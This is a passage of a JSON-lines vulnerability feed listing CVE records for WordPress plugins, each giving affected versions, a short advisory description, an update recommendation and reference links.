":[]}]"}
{"CVE_ID":"CVE-2023-41731","slug":"publish-post-email-notification","versionImpact":"1.0.2.2","versionEndExcluding":"1.0.2.3","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in I Thirteen Web Solution WordPress publish post email notification plugin <=\u00a01.0.2.2 versions.","recommendation":"Update to version 1.0.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/publish-post-email-notification\\\/wordpress-wordpress-publish-post-email-notification-plugin-1-0-2-2-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/publish-post-email-notification\\\/wordpress-wordpress-publish-post-email-notification-plugin-1-0-2-2-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1690","slug":"tmm_stripe_checkout","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"The ThemeMakers Stripe Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'stripe' shortcode in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/ThemeMakers\\\/tmm_stripe_checkout\\\/compare\\\/v1.0.1...v1.0.2\",\"name\":\"https:\\\/\\\/github.com\\\/ThemeMakers\\\/tmm_stripe_checkout\\\/compare\\\/v1.0.1...v1.0.2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/car-dealer-automotive-wordpress-theme-responsive\\\/8574708\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/car-dealer-automotive-wordpress-theme-responsive\\\/8574708\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd040ff7-7f30-4097-9492-743a9821589e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd040ff7-7f30-4097-9492-743a9821589e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12294","slug":"last-viewed-posts","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.1 via the 'get_legacy_cookies' function. This makes it possible for unauthenticated attackers to extract sensitive data including titles and permalinks of private, password-protected, pending, and draft posts.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/last-viewed-posts\\\/trunk\\\/inc\\\/namespace.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/last-viewed-posts\\\/trunk\\\/inc\\\/namespace.php#L131\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205041\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205041\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db838a3f-6afa-4686-8e6a-01edab2dcc96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db838a3f-6afa-4686-8e6a-01edab2dcc96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10112","slug":"wooframework-branding","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"A vulnerability classified as problematic has been found in WooFramework Branding Plugin up to 1.0.1 on WordPress. Affected is the function admin_screen_logic of the file wooframework-branding.php. The manipulation of the argument url leads to open redirect. It is possible to launch the attack remotely. Upgrading to version 1.0.2 is able to address this issue. The name of the patch is f12fccd7b5eaf66442346f748c901ef504742f78. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230652.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wooframework-branding\\\/commit\\\/f12fccd7b5eaf66442346f748c901ef504742f78\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wooframework-branding\\\/commit\\\/f12fccd7b5eaf66442346f748c901ef504742f78\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230652\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230652\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230652\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230652\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10113","slug":"wooframework-tweaks","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"A vulnerability classified as problematic was found in WooFramework Tweaks Plugin up to 1.0.1 on WordPress. Affected by this vulnerability is the function admin_screen_logic of the file wooframework-tweaks.php. The manipulation of the argument url leads to open redirect. The attack can be launched remotely. Upgrading to version 1.0.2 is able to address this issue. The identifier of the patch is 3b57d405149c1a59d1119da6e0bb8212732c9c88. It is recommended to upgrade the affected component. The identifier VDB-230653 was assigned to this vulnerability.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wooframework-tweaks\\\/commit\\\/3b57d405149c1a59d1119da6e0bb8212732c9c88\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/wooframework-tweaks\\\/commit\\\/3b57d405149c1a59d1119da6e0bb8212732c9c88\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230653\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230653\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230653\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230653\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12474","slug":"geodatasource-country-region-dropdown","versionImpact":"1.0.1","versionEndExcluding":"1.0.2","description":"The GeoDataSource Country Region DropDown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gds-country-dropdown' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207322%40geodatasource-country-region-dropdown&new=3207322%40geodatasource-country-region-dropdown&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207322%40geodatasource-country-region-dropdown&new=3207322%40geodatasource-country-region-dropdown&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c974726e-9371-40e5-8664-c12c8c06e5b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c974726e-9371-40e5-8664-c12c8c06e5b9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4746","slug":"fluent-security","versionEndExcluding":"1.0.2","description":"The FluentAuth WordPress plugin before 1.0.2 prioritizes getting a visitor's IP address from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass the IP-based blocks set by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/62e3babc-00c6-4a35-972f-8f03ba70ba32\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/62e3babc-00c6-4a35-972f-8f03ba70ba32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-30616","slug":"form-block","versionEndExcluding":"1.0.2","description":"Form block is a wordpress plugin designed to make form creation easier. Versions prior to 1.0.2 are subject to a Cross-Site Request Forgery due to a missing nonce check. There is potential for a Cross Site Request Forgery for all form blocks, since it allows to send requests to the forms from any website without a user noticing. Users are advised to upgrade to version 1.0.2. There are no known workarounds for this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/form-block\\\/security\\\/advisories\\\/GHSA-j4c2-7p87-q824\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/form-block\\\/security\\\/advisories\\\/GHSA-j4c2-7p87-q824\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/form-block\\\/commit\\\/cf0012fa0710d906c594346ba775c5dc433a9426\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/form-block\\\/commit\\\/cf0012fa0710d906c594346ba775c5dc433a9426\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3632","slug":"photoshow","versionImpact":"1.0.18","versionEndExcluding":"1.0.19","description":"The Smart Image Gallery WordPress plugin before 1.0.19 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"Update to version 1.0.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b11682d-4705-4595-943f-0fa093d0b644\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b11682d-4705-4595-943f-0fa093d0b644\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6985","slug":"ai-assistant-by-10web","versionImpact":"1.0.18","versionEndExcluding":"1.0.19","description":"The 10Web AI Assistant \u2013 AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.","recommendation":"Update to version 1.0.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229245a5-468d-47b9-8f26-d23d593e91da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229245a5-468d-47b9-8f26-d23d593e91da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3027004\\\/ai-assistant-by-10web\\\/trunk\\\/ai-assistant-by-10web.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3027004\\\/ai-assistant-by-10web\\\/trunk\\\/ai-assistant-by-10web.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4626","slug":"jetwidgets-for-elementor","versionImpact":"1.0.17","versionEndExcluding":"1.0.18","description":"The JetWidgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018layout_type\u2019 and 'id' parameters in all versions up to, and including, 1.0.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4457d15e-2c01-498d-b94a-a6e93adcf70c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4457d15e-2c01-498d-b94a-a6e93adcf70c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103042\\\/jetwidgets-for-elementor\\\/tags\\\/1.0.18\\\/includes\\\/addons\\\/jet-widgets-image-comparison.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103042\\\/jetwidgets-for-elementor\\\/tags\\\/1.0.18\\\/includes\\\/addons\\\/jet-widgets-image-comparison.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103042\\\/jetwidgets-for-elementor\\\/tags\\\/1.0.18\\\/includes\\\/addons\\\/jet-widgets-images-layout.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103042\\\/jetwidgets-for-elementor\\\/tags\\\/1.0.18\\\/includes\\\/addons\\\/jet-widgets-images-layout.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12269","slug":"safe-ai-malware-protection-for-wp","versionImpact":"1.0.17","versionEndExcluding":"1.0.18","description":"The Safe Ai Malware Protection for WP plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the export_db() function in all versions up to, and including, 1.0.17. This makes it possible for unauthenticated attackers to retrieve a complete dump of the site's database.","recommendation":"Update to version 1.0.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/safe-ai-malware-protection-for-wp\\\/trunk\\\/includes\\\/class-mvsp-export-db.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/safe-ai-malware-protection-for-wp\\\/trunk\\\/includes\\\/class-mvsp-export-db.php#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5247bf43-ae02-47cb-825e-23821b78eba9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5247bf43-ae02-47cb-825e-23821b78eba9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3473","slug":"99robots-header-footer-code-manager-pro","versionImpact":"1.0.16","versionEndExcluding":"1.0.17","description":"The Header Footer Code Manager Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the message parameter in all versions up to, and including, 1.0.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a35d16-526d-4e45-b2cf-a6858b2b2f21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a35d16-526d-4e45-b2cf-a6858b2b2f21?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/app.loopedin.io\\\/header-footer-code-manager-pro#\\\/updates\",\"name\":\"https:\\\/\\\/app.loopedin.io\\\/header-footer-code-manager-pro#\\\/updates\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5902","slug":"userfeedback-lite","versionImpact":"1.0.15","versionEndExcluding":"1.0.16","description":"The User Feedback \u2013 Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the name parameter in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in feedback form responses that will execute whenever a high-privileged user tries to view them.","recommendation":"Update to version 1.0.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bce9ba42-f574-47c1-9ea5-1e56f9da8e71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bce9ba42-f574-47c1-9ea5-1e56f9da8e71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userfeedback-lite\\\/tags\\\/1.0.15\\\/includes\\\/frontend\\\/class-userfeedback-frontend.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/userfeedback-lite\\\/tags\\\/1.0.15\\\/includes\\\/frontend\\\/class-userfeedback-frontend.php#L257\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12237","slug":"wp-responsive-photo-gallery","versionImpact":"1.0.15","versionEndExcluding":"1.0.16","description":"The Photo Gallery Slideshow & Masonry Tiled Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.15 via the rjg_get_youtube_info_justified_gallery_callback function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to retrieve limited information from internal services.","recommendation":"Update to version 1.0.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.15\\\/wp-responsive-photo-gallery.php#L3023\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.15\\\/wp-responsive-photo-gallery.php#L3023\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.15\\\/wp-responsive-photo-gallery.php#L3044\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.15\\\/wp-responsive-photo-gallery.php#L3044\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08e44434-8908-4c63-9e5b-9a8b387255d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08e44434-8908-4c63-9e5b-9a8b387255d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1259","slug":"hotjar","versionImpact":"1.0.15","versionEndExcluding":"1.0.16","description":"The Hotjar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the hotjar_site_id in versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.0.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hotjar\\\/tags\\\/1.0.14\\\/includes\\\/class-hotjar.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hotjar\\\/tags\\\/1.0.14\\\/includes\\\/class-hotjar.php#L40\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c640bcb-b6bf-4865-b713-32ca846e4ed9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c640bcb-b6bf-4865-b713-32ca846e4ed9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7327","slug":"business-reviews-wp","versionImpact":"1.0.15","versionEndExcluding":"1.0.16","description":"The Widget for Google Reviews plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.0.15 via the layout parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. This is limited to just PHP files.","recommendation":"Update to version 1.0.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3316262%40business-reviews-wp%2Ftrunk&old=3201057%40business-reviews-wp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3316262%40business-reviews-wp%2Ftrunk&old=3201057%40business-reviews-wp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4681e56f-1dad-46a7-8ac7-1f543a383433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4681e56f-1dad-46a7-8ac7-1f543a383433?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13335","slug":"sastra-essential-addons-for-elementor","versionImpact":"1.0.14","versionEndExcluding":"1.0.15","description":"The Spexo Addons for Elementor \u2013 Free Elementor Addons, Widgets and Templates plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the tmpcoder_theme_install_func() function in all versions up to, and including, 1.0.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install a theme.","recommendation":"Update to version 1.0.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227353\\\/sastra-essential-addons-for-elementor\\\/trunk\\\/inc\\\/wizard\\\/wizard-ajax-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227353\\\/sastra-essential-addons-for-elementor\\\/trunk\\\/inc\\\/wizard\\\/wizard-ajax-api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4edc7ef9-33db-4433-8ef2-cd06089ee8d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4edc7ef9-33db-4433-8ef2-cd06089ee8d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9206","slug":"mas-wp-job-manager-company","versionImpact":"1.0.13","versionEndExcluding":"1.0.14","description":"The MAS Companies For WP Job Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.13. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc277e7c-86ec-448f-a91e-e4d12a4b4177?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc277e7c-86ec-448f-a91e-e4d12a4b4177?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mas-wp-job-manager-company\\\/tags\\\/1.0.13\\\/templates\\\/company-dashboard.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mas-wp-job-manager-company\\\/tags\\\/1.0.13\\\/templates\\\/company-dashboard.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170459\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3170459\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5082","slug":"history-log-by-click5","versionImpact":"1.0.12","versionEndExcluding":"1.0.13","description":"The History Log by click5 WordPress plugin before 1.0.13 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.","recommendation":"Update to version 1.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13a196ba-49c7-4575-9a49-3ef9eb2348f3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13a196ba-49c7-4575-9a49-3ef9eb2348f3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13547","slug":"athemes-addons-for-elementor-lite","versionImpact":"1.0.12","versionEndExcluding":"1.0.13","description":"The aThemes Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Accordion widget in all versions up to, and including, 1.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230740\\\/athemes-addons-for-elementor-lite\\\/trunk\\\/inc\\\/modules\\\/widgets\\\/image-accordion\\\/class-image-accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230740\\\/athemes-addons-for-elementor-lite\\\/trunk\\\/inc\\\/modules\\\/widgets\\\/image-accordion\\\/class-image-accordion.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e0f7686-1c8c-49d6-9d0b-3c8df6c24d0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e0f7686-1c8c-49d6-9d0b-3c8df6c24d0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12467","slug":"pago-redsys-tpv-grafreak","versionImpact":"1.0.12","versionEndExcluding":"1.0.13","description":"The Pago por Redsys plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'Ds_MerchantParameters' parameter in all versions up to, and including, 1.0.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pago-redsys-tpv-grafreak\\\/tags\\\/1.0.13\\\/includes\\\/class-redsysapi.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pago-redsys-tpv-grafreak\\\/tags\\\/1.0.13\\\/includes\\\/class-redsysapi.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pago-redsys-tpv-grafreak\\\/tags\\\/1.0.13\\\/public\\\/partials\\\/pago-redsys-grafreak-public-display.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pago-redsys-tpv-grafreak\\\/tags\\\/1.0.13\\\/public\\\/partials\\\/pago-redsys-grafreak-public-display.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215878%40pago-redsys-tpv-grafreak&new=3215878%40pago-redsys-tpv-grafreak&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215878%40pago-redsys-tpv-grafreak&new=3215878%40pago-redsys-tpv-grafreak&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed05cd81-ca21-41de-9b02-bd84498cd74e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed05cd81-ca21-41de-9b02-bd84498cd74e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36714","slug":"brizy","versionEndExcluding":"1.0.126","description":"The Brizy plugin for WordPress is vulnerable to authorization bypass due to a incorrect capability check on the is_administrator() function in versions up to, and including, 1.0.125. This makes it possible for authenticated attackers to access and interact with available AJAX functions.","recommendation":"Update to version 1.0.126, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9495e25d-a5a6-4f25-9363-783626e58a4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9495e25d-a5a6-4f25-9363-783626e58a4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-brizy-page-builder-plugin-fixed-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-brizy-page-builder-plugin-fixed-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
